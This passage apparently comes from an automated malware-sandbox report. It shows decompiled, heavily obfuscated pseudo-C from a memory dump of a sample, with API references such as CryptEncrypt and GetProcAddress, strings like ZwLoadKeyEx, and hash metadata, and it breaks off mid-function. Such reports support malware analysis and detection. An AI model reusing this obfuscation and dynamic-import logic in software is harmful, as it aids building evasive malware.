                                                          				 *0x5086c5 =  *0x5086c5 - __edi;
                                                          				_t43 = 0;
                                                          				 *0x50afd8 =  *0x50afd8 - 0x9b1a6;
                                                          				_t23 = "EnumWindowStationsA" & 0x000049e2;
                                                          				_t31 = __ecx - 0x577a7e;
                                                          				 *0x508176 = _t31;
                                                          				 *0x508194 = _t31;
                                                          				if(0x8541 >= 0) {
                                                          					goto L5;
                                                          				}
                                                          				 *0x508210 = 0x90d8;
                                                          				goto L3;
                                                          			}










                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: EnumWindowStationsA$diskperf.exe
                                                          • API String ID: 0-333883692
                                                          • Opcode ID: 7e3f046dd20e9083de6739f81c24637f21c5f492bf4c650f19fd8ff799857cd8
                                                          • Instruction ID: c7a0b663673fd513de0e92068407414154e59e957b308ecf78d36dde6e6931ec
                                                          • Opcode Fuzzy Hash: 7e3f046dd20e9083de6739f81c24637f21c5f492bf4c650f19fd8ff799857cd8
                                                          • Instruction Fuzzy Hash: F321666D6447C28BC700CF39FC58ADD3B71EB35304708456A88D087B77EA26190EEB56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CryptEncrypt.ADVAPI32(?,00000000,00000001,?,00000000,?,00000000), ref: 004C49A6
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: CryptEncrypt
                                                          • String ID:
                                                          • API String ID: 1352496322-0
                                                          • Opcode ID: 7fbc60aa7d65d1e3df4ab46b86413178a2b0d0e90dc1d9494221a742818a00cf
                                                          • Instruction ID: 9097c1caef0158749b0519874386637e7db78cbb3444d7e22166045a35419d6a
                                                          • Opcode Fuzzy Hash: 7fbc60aa7d65d1e3df4ab46b86413178a2b0d0e90dc1d9494221a742818a00cf
                                                          • Instruction Fuzzy Hash: FBE03975A0022AABDF10CBA1CD19FEF7EB5FB94740F00452EF402B2280DB769904DB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E004C4C3A(BYTE* _a4, int _a8) {
                                                          				char _v8;
                                                          				DWORD* _v12;
                                                          				char* _v20;
                                                          				int _t10;
                                                          
                                                          				_v20 = 0;
                                                          				_v12 =  &_v8;
                                                          				_t10 = CryptBinaryToStringA(_a4, _a8, 1, 0, _v12);
                                                          				if(_t10 == 0) {
                                                          					return _v20;
                                                          				} else {
                                                          					_push(_v8);
                                                          					_push(E004C4C79);
                                                          					_push(E004A873F);
                                                          					return _t10;
                                                          				}
                                                          			}








                                                          APIs
                                                          • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 004C4C61
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: BinaryCryptString
                                                          • String ID:
                                                          • API String ID: 80407269-0
                                                          • Opcode ID: e3050fd146b8024631d0110c422364e65041b2c447adf0ce6e1444639b44a423
                                                          • Instruction ID: 4dd88b82a2e420a0927c0580e097f437135fdb11b71fc8c9ec856c437501c572
                                                          • Opcode Fuzzy Hash: e3050fd146b8024631d0110c422364e65041b2c447adf0ce6e1444639b44a423
                                                          • Instruction Fuzzy Hash: F5E09239A00109BBDF00CF90CD45FCE7BB5FB50700F610025B414A22E0E7758A10EB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004B602D() {
                                                          				char _v20;
                                                          				struct _SYSTEMTIME* _v24;
                                                          				struct _SYSTEMTIME* _t4;
                                                          
                                                          				_t4 =  &_v20;
                                                          				_v24 = _t4;
                                                          				GetLocalTime(_v24);
                                                          				return _t4;
                                                          			}







                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID:
                                                          • API String ID: 481472006-0
                                                          • Opcode ID: 4a7b0feb7542fa2ccbc58ac8c935e19584b1d26fb0435ec7f987aa014bb7eb5b
                                                          • Instruction ID: e751708e558e307253df805dc366075d31e218175f6ee47b213e872804cb8d8a
                                                          • Opcode Fuzzy Hash: 4a7b0feb7542fa2ccbc58ac8c935e19584b1d26fb0435ec7f987aa014bb7eb5b
                                                          • Instruction Fuzzy Hash: 46C04C7080060E4BCB00DB959D469AFB6B8AA40214F5005719911B12D1E7A19F108AE6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 36%
                                                          			E0048E980(intOrPtr __eax, void* __ebx, signed int __ecx, short __esi) {
                                                          				intOrPtr _t25;
                                                          				char _t29;
                                                          				char _t31;
                                                          				short _t66;
                                                          				signed short _t67;
                                                          				void* _t70;
                                                          				short _t72;
                                                          				void* _t75;
                                                          
                                                          				_t72 = __esi;
                                                          				_t55 = __ecx;
                                                          				 *((intOrPtr*)(_t75 - 8)) = __eax;
                                                          				if(__eax < 0x2242f2) {
                                                          					 *((intOrPtr*)(_t75 - 0x10)) = __ecx;
                                                          					_t55 = 0x6d29;
                                                          					 *0x50afde =  *0x50afde + 0x6d29;
                                                          				}
                                                          				E00465B85(_t72, 1, _t55);
                                                          				_t65 = 0x50afe0;
                                                          				 *0x50823a = _t72;
                                                          				_t25 =  *((intOrPtr*)(_t75 - 8));
                                                          				 *((intOrPtr*)(_t75 - 0x2c)) = _t25;
                                                          				_push( *((intOrPtr*)(_t75 - 0x2c)));
                                                          				_t70 = 0x50af30;
                                                          				 *((intOrPtr*)(_t75 - 8)) = _t25;
                                                          				 *((intOrPtr*)(_t75 - 0xc)) = 0x333714;
                                                          				_t29 =  *((intOrPtr*)(_t75 - 8));
                                                          				if(0x333714 < 0x2d14b1) {
                                                          					L5:
                                                          					goto L6;
                                                          				} else {
                                                          					_t55 = 0x73;
                                                          					 *0x5081e0 = 0x50afe0;
                                                          					_t65 = 0xa888;
                                                          					 *0x50afe3 = _t29;
                                                          					 *0x5086c7 =  *0x5086c7 - 0x50af30;
                                                          					 *0x50afe6 =  *0x50afe6 + _t29;
                                                          					if(0x50af30 != 0) {
                                                          						L6:
                                                          						if(0x3516d2 >= 0x3516d2) {
                                                          							_t55 = 0x00006a80 >> 0x00006a80 ^ _t65;
                                                          						}
                                                          						_t66 = _t65 + 0x91ec;
                                                          						_push( *0x5084c3);
                                                          						 *((intOrPtr*)(_t75 - 8)) = _t29;
                                                          						if(_t29 <= 0x25a1) {
                                                          							L13:
                                                          							_t67 = _t66 - 1;
                                                          							if((_t67 & 0x00000097) > 0) {
                                                          								goto L16;
                                                          							}
                                                          							goto L14;
                                                          						} else {
                                                          							if(0 > 0x36f690) {
                                                          								 *((intOrPtr*)(_t75 - 0x10)) =  *((intOrPtr*)(_t75 - 0x10));
                                                          								 *0x508118 = _t55;
                                                          							}
                                                          							 *0x5081b8 = _t66;
                                                          							_t67 = _t66 + 0x84bf69 - 0x9e;
                                                          							if((_t67 & 0x000000ae) >= 0) {
                                                          								L14:
                                                          								if((_t67 & 0x00009cf1) > 0) {
                                                          									_t29 =  *0x50afe1; // -128
                                                          									 *0x50afe3 = _t29;
                                                          									_t70 = _t70 - 0xdc04;
                                                          								}
                                                          								L16:
                                                          								 *0x5086f3 =  *0x5086f3 - _t70;
                                                          								 *0x50afe6 = _t29;
                                                          								_push(0x48eb18);
                                                          								_push( *0x5087b7);
                                                          								return  *((intOrPtr*)(_t75 - 8));
                                                          							} else {
                                                          								_t31 =  *0x50afe3; // -68
                                                          								 *0x50afe5 = _t31;
                                                          								_t70 = _t70 - 0xd99a83 + 0x723;
                                                          								 *0x50858f = _t31;
                                                          								_t29 =  *0x50897b;
                                                          								 *((intOrPtr*)(_t75 - 0xc)) = 1;
                                                          								goto L13;
                                                          							}
                                                          						}
                                                          					}
                                                          					goto L5;
                                                          				}
                                                          			}












                                                          Strings
                                                          • Microsoft.Office.Tools.Outlook.v9.0.ni.dll, xrefs: 0048EA3F
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Microsoft.Office.Tools.Outlook.v9.0.ni.dll
                                                          • API String ID: 0-2731971894
                                                          • Opcode ID: de954919ab3d127d668695dc7e0d31a2310241ead96e74d1889034801ddde702
                                                          • Instruction ID: b2d6eb58afd4542b46017ec4b32cd1de28fea4fa86d4ad8a4a70b5a4c34f6716
                                                          • Opcode Fuzzy Hash: de954919ab3d127d668695dc7e0d31a2310241ead96e74d1889034801ddde702
                                                          • Instruction Fuzzy Hash: B441F4B9A403429FCB01EFBADC94ADD7BB1FB38710F04823A885497762D6B90509AB15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E004B89DC(intOrPtr __ebx, void* __edx, void* __eflags) {
                                                          				intOrPtr _t6;
                                                          				void* _t12;
                                                          				void* _t15;
                                                          				void* _t16;
                                                          				void* _t17;
                                                          
                                                          				 *((intOrPtr*)(_t17 - 8)) = __ebx;
                                                          				E004AF283(__ebx + __ebx + __ebx + __ebx, _t12, _t15, _t16, 1);
                                                          				_t6 =  *0x5083ff; // 0x0
                                                          				 *0x50864f =  *0x50864f - _t6;
                                                          				 *0x5087e7 =  *0x5087e7 + _t6;
                                                          				_push(0);
                                                          				_push("api-ms-win-core-sysinfo-l1-1-0.dll");
                                                          				_push(E004B8A22);
                                                          				_push(E004B4774);
                                                          				return 0;
                                                          			}









                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: api-ms-win-core-sysinfo-l1-1-0.dll
                                                          • API String ID: 0-3124788603
                                                          • Opcode ID: 5037d76fa7c9218cec471b1fa67a97354ae365782f65e9af5426005bbaa5156d
                                                          • Instruction ID: e2c106303584e9c26e408f4b7b216075225ffd218a3aa7dd954000f6e783491c
                                                          • Opcode Fuzzy Hash: 5037d76fa7c9218cec471b1fa67a97354ae365782f65e9af5426005bbaa5156d
                                                          • Instruction Fuzzy Hash: 35E086347C03029FC700AFA4ACD1FED33A0E328714F90406AA88087281CEAD1C4A9754
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E005032A3(void* __eax, intOrPtr __ebx, void* __ecx, void* __eflags) {
                                                          				void* _t18;
                                                          				void* _t19;
                                                          
                                                          				 *0x5089af = 0x1d035b;
                                                          				E004EE3C4(0x1d035b - __ebx, __ebx, __ecx - 0x5e61, 0x8daf, _t18, _t19, __eflags, 0x8daf);
                                                          				_push(0x8bc73);
                                                          				_push(E005032F3);
                                                          				_push(E004F7458);
                                                          				return 0x8bc73;
                                                          			}






                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 65319428b36f4c9dd4099b075ec943f9e784ae6b70a32b8a07ae81fd69cf06c6
                                                          • Instruction ID: ed990ead3f8910f59e1bc9b44fecef06c82ad301223f698cae06c27d551cc680
                                                          • Opcode Fuzzy Hash: 65319428b36f4c9dd4099b075ec943f9e784ae6b70a32b8a07ae81fd69cf06c6
                                                          • Instruction Fuzzy Hash: B9E02624A642029FC700BF3EDC06DB6329BA7B4B3034442723450D37D4DE2A8601875E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 23%
                                                          			E004C49C6() {
                                                          				intOrPtr _t13;
                                                          				void* _t19;
                                                          				void* _t21;
                                                          				void* _t22;
                                                          				void* _t23;
                                                          
                                                          				 *((intOrPtr*)(_t23 - 0x18)) = _t13;
                                                          				L004ADF2E(_t13, _t19, _t21, _t22,  *((intOrPtr*)(_t23 - 0x1c)),  *((intOrPtr*)(_t23 - 0x18)),  *((intOrPtr*)(_t23 - 0x20)));
                                                          				 *((intOrPtr*)(_t23 - 0x28)) =  *((intOrPtr*)(_t23 - 0x20));
                                                          				_push( *((intOrPtr*)(_t23 - 0x10)));
                                                          				 *((intOrPtr*)(_t23 - 0x24)) = _t23 - 0x28;
                                                          				_push( *((intOrPtr*)(_t23 - 0x24)));
                                                          				_push( *((intOrPtr*)(_t23 - 0x18)));
                                                          				_push(0);
                                                          				_push(1);
                                                          				_push(0);
                                                          				_push( *((intOrPtr*)(_t23 - 8)));
                                                          				_push(0x4c4a08);
                                                          				goto ( *0x50928b);
                                                          			}









                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d4c110a7f0249479205fd5740fd73ac64ade66cddeb2532363825864e6d1e70a
                                                          • Instruction ID: 984634b11023cc2a1ec3acfd35d1f05cde5d863d4b41d3797915dc7e1d3ef40e
                                                          • Opcode Fuzzy Hash: d4c110a7f0249479205fd5740fd73ac64ade66cddeb2532363825864e6d1e70a
                                                          • Instruction Fuzzy Hash: CCF0797890020AEEEF058FD0C8829EEBAB6FB08300F20006AE60176164D2765950AB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E004C4A53() {
                                                          				void* _t15;
                                                          				void* _t16;
                                                          
                                                          				 *((intOrPtr*)( *((intOrPtr*)(_t16 + 0x14)))) =  *((intOrPtr*)(_t16 - 0x20));
                                                          				 *__eax =  *((intOrPtr*)(_t16 - 0x1c));
                                                          				 *((intOrPtr*)(_t16 - 0x30)) = 1;
                                                          				_push( *((intOrPtr*)(_t16 - 0x18)));
                                                          				L004ACE34(_t15);
                                                          				_push( *((intOrPtr*)(_t16 - 8)));
                                                          				_push(E004C4A89);
                                                          				goto ( *0x508f43);
                                                          			}






                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7703a66480a93b02255f9e13a3b02b5a93103f6c8aeaf468ae7bd0832f20ab32
                                                          • Instruction ID: 249b4446d5d1d11c226d8e3daee3aba9f9e2fd6925082780c6b74a994f648ecf
                                                          • Opcode Fuzzy Hash: 7703a66480a93b02255f9e13a3b02b5a93103f6c8aeaf468ae7bd0832f20ab32
                                                          • Instruction Fuzzy Hash: 6FE0BD79A0020AEFCB00CF85E880D9EBBB2FB9C300F004095EA0063320CB75A8159F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 39%
                                                          			E004A5421() {
                                                          				intOrPtr _t123;
                                                          				char _t125;
                                                          				char _t127;
                                                          				char _t134;
                                                          				intOrPtr _t145;
                                                          				char _t148;
                                                          				char _t154;
                                                          				char _t158;
                                                          				signed int _t201;
                                                          				signed int _t205;
                                                          				intOrPtr _t228;
                                                          				short _t262;
                                                          				intOrPtr _t271;
                                                          				signed int _t274;
                                                          				signed int _t275;
                                                          				unsigned short _t276;
                                                          				void* _t279;
                                                          				short _t281;
                                                          				intOrPtr _t286;
                                                          				void* _t288;
                                                          				intOrPtr _t295;
                                                          				short _t297;
                                                          				short _t302;
                                                          				signed short _t323;
                                                          				signed int _t324;
                                                          				void* _t325;
                                                          
                                                          				 *(_t325 - 0xc) = 0x33c692;
                                                          				_push( *0x5080a0);
                                                          				 *(_t325 - 0x10) = 0x33c692;
                                                          				_t262 =  *0x508146; // 0x93d7
                                                          				 *0x508198 = _t262;
                                                          				_t295 =  *0x5081e4; // 0x5a9a
                                                          				 *0x508166 = _t262;
                                                          				_push( *0x5080c8);
                                                          				 *(_t325 - 0xc) = "AddInUtil.exe";
                                                          				_push( *0x508044);
                                                          				 *(_t325 - 0xc) = 0x175b75a;
                                                          				 *0x508142 = 0x6877;
                                                          				_push( *0x5080d8);
                                                          				 *(_t325 - 0xc) = 0x507c52;
                                                          				 *0x5080ac =  *0x5080ac;
                                                          				 *0x5080c2 =  *0x5080c2;
                                                          				 *(_t325 - 0x10) =  *(_t325 - 0x10);
                                                          				 *0x508b17 = 0x258b9d;
                                                          				_t271 =  *0x508144; // 0x779d
                                                          				 *(_t325 - 0xc) =  *(_t325 - 0xc) - 0x2e7d9d;
                                                          				 *0x508164 = _t271 - 0x5f0d8e;
                                                          				_t274 = 0x525c10;
                                                          				_t297 = _t295 - 0x9d + 1;
                                                          				_t123 = E005007C9(0xffffffffffffffa4, _t323,  *0x50817c,  *0x5080a0);
                                                          				if((0 & _t323) < 0) {
                                                          				}
                                                          				 *((intOrPtr*)(_t325 - 8)) = _t123;
                                                          				_t201 = 0x468401;
                                                          				_t125 =  *((intOrPtr*)(_t325 - 8));
                                                          				if(_t274 >= _t274) {
                                                          					L7:
                                                          					_t201 = "ZwLoadKeyEx" & 0x00000029;
                                                          					L8:
                                                          					_t205 = "GetTickCount64";
                                                          					 *0x5080ec =  *0x5080ec - _t205;
                                                          					 *((intOrPtr*)(_t325 - 0x2c)) = _t125;
                                                          					 *((intOrPtr*)(_t325 - 8)) = _t125;
                                                          					if(_t125 == 0x23) {
                                                          						L11:
                                                          						 *0x50afe5 = _t125;
                                                          						L12:
                                                          						_t127 =  *0x50afe6; // -97
                                                          						_t317 = 0xffffffffff222cf3;
                                                          						 *0x50851b = _t127;
                                                          						_push( *((intOrPtr*)(_t325 - 0x2c)));
                                                          						if(_t205 < 0x2fda33) {
                                                          							_t205 =  !_t205 +  !_t205;
                                                          							_t274 = _t274 - 0x54e4;
                                                          							if(_t274 < _t274) {
                                                          								 *0x508168 = _t274;
                                                          								_t274 =  *0x5081b8; // 0x0
                                                          								 *0x508204 = 0x8c15;
                                                          								_t297 = 0;
                                                          								_t323 = 0;
                                                          								_t317 = 0x5086d1;
                                                          							}
                                                          						}
                                                          						_push( *0x508523);
                                                          						_t208 = 0x47e097;
                                                          						_t134 =  *((intOrPtr*)(_t325 - 8));
                                                          						_t275 =  !_t274;
                                                          						 *((intOrPtr*)(_t325 - 8)) = _t134;
                                                          						if(_t134 >= 0x22) {
                                                          							if(_t134 <= 0x2c876e) {
                                                          								_t208 = 0x482202;
                                                          								 *0x5080f0 =  *0x5080f0 + 0x482202;
                                                          							}
                                                          							_t208 = _t208 + _t208;
                                                          							if(_t275 < _t275) {
                                                          							}
                                                          						}
                                                          						 *0x5081aa = _t297;
                                                          						 *0x50afe1 = _t134;
                                                          						 *((intOrPtr*)(_t325 - 8)) = GetProcAddress(??, ??);
                                                          						 *(_t325 - 0xc) = 0x2f570b;
                                                          						_t276 =  *0x508116; // 0x5c48
                                                          						L004668D8(_t276 >> _t276, 0x9825, _t317, _t323, _t276 >> _t276, _t276 >> _t276, _t276 >> _t276);
                                                          						_t279 = 0x7cc9;
                                                          						 *0x5081d2 = 0x9825;
                                                          						_t145 =  *((intOrPtr*)(_t325 - 8));
                                                          						 *0x509993 = _t145;
                                                          						_t324 = _t323 + _t323;
                                                          						 *((intOrPtr*)(_t325 - 8)) = _t145;
                                                          						if(_t145 > 0x21) {
                                                          							_t279 = 0xffffffffffffff96;
                                                          							 *0x50818e =  *0x50818e;
                                                          							 *0x5081a8 =  *0x5081a8 + 0xac18;
                                                          							if(0x8408 <= 0) {
                                                          								_t158 =  *0x50afe3; // -68
                                                          								 *0x50afe5 = _t158;
                                                          								_t317 = _t317 + 0xd5ba7b;
                                                          							}
                                                          						}
                                                          						 *0x50afdd =  *0x50afdd + _t279;
                                                          						 *((intOrPtr*)(_t325 - 0x14)) =  *((intOrPtr*)(_t325 - 0x14)) - _t279;
                                                          						_t281 =  *0x5081ac; // 0x9f6d
                                                          						_t302 = 0x90bc;
                                                          						_push(0);
                                                          						_t148 =  *((intOrPtr*)(_t325 - 8));
                                                          						 *(_t325 - 0xc) = "EtwEventWriteStartScenario";
                                                          						 *(_t325 - 0x10) =  *(_t325 - 0x10) - _t281;
                                                          						 *0x50817e = _t281;
                                                          						 *0x50821a = 0x90bc;
                                                          						if((_t324 & 0x0000aa7a) < 0) {
                                                          							if((_t324 & 0x00a70a49) >= 0) {
                                                          								 *0x50a8ca =  *0x50a8ca + _t324;
                                                          							}
                                                          							_t317 = _t317 - 0xf170;
                                                          							 *0x50afe6 = _t148;
                                                          							if(_t148 > 0x137ab9) {
                                                          							}
                                                          						}
                                                          						 *0x508132 = 0xffffffffffff7cf2;
                                                          						_t286 = 0x7c37;
                                                          						if(0 == 0) {
                                                          							_t302 = 0xa3a3;
                                                          							 *0x509de7 =  *0x509de7 - _t324;
                                                          						}
                                                          						_t228 =  *0x50afe3; // -68
                                                          						_push( *0x508218);
                                                          						if(_t148 < 0) {
                                                          							L34:
                                                          							 *0x5081d6 = _t302;
                                                          							 *0x5081f0 = _t302;
                                                          							_t302 = _t302 - 0xffffffffffff530b;
                                                          							 *0x50afe3 = _t148;
                                                          							if(_t148 <= 0) {
                                                          								goto L38;
                                                          							}
                                                          							 *0x50afe6 = _t148;
                                                          							goto L36;
                                                          						} else {
                                                          							if(_t148 >= 0x735f3) {
                                                          								L36:
                                                          								if(_t148 >= 0x20bc) {
                                                          									L39:
                                                          									 *((intOrPtr*)(_t325 - 0x14)) =  *((intOrPtr*)(_t325 - 0x14)) + _t286;
                                                          									 *0x50965b =  *0x50965b - _t302;
                                                          									_push( *0x5080a0);
                                                          									_t288 = 0x8065;
                                                          									 *0x5081f8 = 0;
                                                          									 *((intOrPtr*)(_t325 - 8)) = _t148;
                                                          									 *(_t325 - 0xc) = 0x3b852c;
                                                          									_t154 =  *((intOrPtr*)(_t325 - 8));
                                                          									_push( *0x5080a8);
                                                          									if(0x8065 >= 0x8065) {
                                                          										if(0x8065 < 0x8065) {
                                                          											 *0x508168 =  *0x508168 + 0x8065;
                                                          										}
                                                          										_t288 = _t288 + _t288;
                                                          									}
                                                          									 *0x50afe5 = _t154;
                                                          									_push( *0x50806e);
                                                          									 *((intOrPtr*)(_t325 - 8)) = _t154;
                                                          									_push(_t154);
                                                          									_push(0);
                                                          									_push(0);
                                                          									_push(0x4a5a32);
                                                          									goto __eax;
                                                          								}
                                                          								_t228 = 0xf3815 + _t148 + 0x3864;
                                                          								L38:
                                                          								 *(_t325 - 0x10) = _t228 + 0x49;
                                                          								_t286 = 0x67b2;
                                                          								goto L39;
                                                          							}
                                                          							 *(_t325 - 0xc) = 0x1c6cba;
                                                          							_t228 = 0x398760;
                                                          							 *0x50afdd =  *0x50afdd + _t286;
                                                          							_t286 =  *0x50818a; // 0x85b0
                                                          							goto L34;
                                                          						}
                                                          					}
                                                          					 *0x50afdc =  *0x50afdc - 0x3b2f1a;
                                                          					_t205 = 0x1a;
                                                          					_t274 = 0x6969;
                                                          					 *0x5081ac = _t297;
                                                          					_t297 = 0xffffffffff77080d;
                                                          					 *0x50afe1 = _t125;
                                                          					if((_t323 & 0x00a540fc) >= 0) {
                                                          						goto L12;
                                                          					} else {
                                                          						_t323 = _t323 - 0xc806;
                                                          						goto L11;
                                                          					}
                                                          				}
                                                          				if(_t274 <= _t274) {
                                                          					L6:
                                                          					 *0x5086bd =  *0x5086bd;
                                                          					_t201 = _t201 + _t125;
                                                          					goto L7;
                                                          				}
                                                          				_t274 = 0x760b;
                                                          				_t297 = 0x508208;
                                                          				if((_t323 & 0x0000b51f) <= 0) {
                                                          					goto L8;
                                                          				} else {
                                                          					_t201 =  *0x50afe3; // -68
                                                          					goto L6;
                                                          				}
                                                          			}






























                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 004A575A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: ./R$AddInUtil.exe$CIRCoInst.dll$EtwEventWriteStartScenario$GetTickCount64$System.Web.DynamicData.dll$SystemPropertiesComputerName.exe$ZwLoadKeyEx$api-ms-win-core-rtlsupport-l1-1-0.dll$credssp.dll$ddrawex.dll$nshhttp.dll$Nqt
                                                          • API String ID: 190572456-3883461974
                                                          • Opcode ID: 92a14c32943a8ec00913f4038b2ae9c5445bab3a86a31e069b049e1419127c38
                                                          • Instruction ID: 150ccaa013818fe99bded3eeda6018a2b52fea0904a2fa7a6938af653488546b
                                                          • Opcode Fuzzy Hash: 92a14c32943a8ec00913f4038b2ae9c5445bab3a86a31e069b049e1419127c38
                                                          • Instruction Fuzzy Hash: BAF18C79A107069FCB00DFB9E894AEDBBB0FF39310F04807AD994A7352E6781949DB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 24%
                                                          			E0048651B(intOrPtr __ebx, void* __edi, void* __esi) {
                                                          				signed int _t62;
                                                          				signed char _t65;
                                                          				signed char _t66;
                                                          				signed char _t68;
                                                          				signed char _t72;
                                                          				signed char _t76;
                                                          				_Unknown_base(*)()* _t77;
                                                          				signed char _t83;
                                                          				signed char _t89;
                                                          				intOrPtr _t95;
                                                          				signed char _t110;
                                                          				void* _t115;
                                                          				signed int _t119;
                                                          				intOrPtr _t136;
                                                          				signed char _t168;
                                                          				signed short _t187;
                                                          				void* _t193;
                                                          				unsigned short _t195;
                                                          				unsigned short _t196;
                                                          				intOrPtr _t214;
                                                          				short _t215;
                                                          				signed short _t216;
                                                          				void* _t217;
                                                          				short _t222;
                                                          				intOrPtr _t230;
                                                          				void* _t232;
                                                          				void* _t233;
                                                          				void* _t234;
                                                          				void* _t235;
                                                          				void* _t236;
                                                          				void* _t237;
                                                          				void* _t238;
                                                          				signed short _t242;
                                                          				void* _t246;
                                                          
                                                          				_t235 = __esi;
                                                          				_t232 = __edi;
                                                          				 *((intOrPtr*)(_t246 - 0x10)) = __ebx;
                                                          				_t62 =  *(_t246 - 8);
                                                          				_t186 = 0;
                                                          				if(0 == 0) {
                                                          					_t186 = 0x69902f;
                                                          				}
                                                          				if(_t186 == _t186) {
                                                          					_t215 = 0x953d;
                                                          					 *0x50823c = 0x953d;
                                                          				}
                                                          				_t236 = _t235 + _t235;
                                                          				 *0x50834f =  *0x50834f + _t236;
                                                          				_push( *0x5080c8);
                                                          				_t237 = _t236 - _t232;
                                                          				 *0x50afe6 = _t62;
                                                          				_t233 = _t232 - _t62;
                                                          				 *(_t246 - 8) = _t62;
                                                          				if( !_t62 >= 0x30d4) {
                                                          					 *((intOrPtr*)(_t246 - 0x10)) =  *((intOrPtr*)(_t246 - 0x10)) + "nshhttp.dll";
                                                          					 *0x508120 = _t186;
                                                          					_t214 =  *0x50815a; // 0x98
                                                          					_t186 = _t214 - 0x645dab;
                                                          					_t215 = 0x9f36;
                                                          				}
                                                          				_t65 =  *(_t246 - 8);
                                                          				if(_t65 < 0x1a) {
                                                          					if(_t65 <= 0x22) {
                                                          						 *((intOrPtr*)(_t246 - 0xc)) =  *((intOrPtr*)(_t246 - 0xc)) - 0x2cbb78;
                                                          					}
                                                          				}
                                                          				_t187 = _t186 - 0x63;
                                                          				 *0x50815e =  *0x50815e + _t187;
                                                          				_t216 = _t215 + 0x8b;
                                                          				_push( *0x50800a);
                                                          				_t238 = _t237 - 1;
                                                          				if(_t65 < 0) {
                                                          					L19:
                                                          					 *0x50afd9 =  *0x50afd9 - _t65;
                                                          					 *0x5085ab = _t65;
                                                          					_t66 = E005007C9( *((intOrPtr*)(_t246 - 0xc)), _t238,  *0x5081ee,  *0x5080d8);
                                                          					_t110 =  *0x50afe5; // -1
                                                          					 *(_t246 - 8) = _t66;
                                                          					if(_t66 > 0x24362f) {
                                                          						L27:
                                                          						 *0x50afdc =  *0x50afdc + _t110;
                                                          						L28:
                                                          						E00508174 = 0x609c;
                                                          						_t217 = _t216 + 0x8a;
                                                          						 *0x5081f8 =  *0x5081f8 - _t217;
                                                          						_t239 = 0x50afe1;
                                                          						_t68 =  *(_t246 - 8);
                                                          						 *(_t246 - 0x2c) = _t68;
                                                          						 *(_t246 - 8) = _t68;
                                                          						_t115 = 0;
                                                          						_t72 =  *(_t246 - 8);
                                                          						if(0 > 0x2f07ed) {
                                                          							L32:
